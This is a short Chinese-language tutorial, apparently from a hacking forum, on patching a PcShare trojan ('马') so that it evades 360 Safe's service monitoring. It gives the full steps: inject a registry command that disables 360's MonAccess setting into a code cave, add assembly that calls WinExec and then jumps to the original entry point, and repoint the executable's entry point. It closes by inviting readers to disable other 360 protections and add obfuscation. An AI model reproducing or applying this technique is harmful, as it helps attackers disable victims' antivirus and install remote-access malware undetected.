PCSHARE过360服务项监控

nsiz

ASM汇编
这个是最舒服的，用OD打开已经配置好的马，找0区（也可以用TOPO加空段）要很大一片哦！右击，选择“二进制”→“编辑”，在ASCII中输入“Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”记下写入命令的改动的第一个地址，假设为401180。
再找一个小空段，记下地址，假设为40116A
写入：
Push 401180                (也就是那个改动的地址)
Call WinExec
Jmp 原程序入口点（在OD右边窗口的EIP后面可以看到）
打开OC把40116A转换为文件偏移0000056A
再用PEditor打开，把原入口点改为0000056A
这样一个过360服务监控的木马就诞生了。
（大家完全可以按照加花的步骤来写，就是命令不同而已）
大家也可以禁用其他360的监控项目，即使加个花都没问题，随便大家发挥了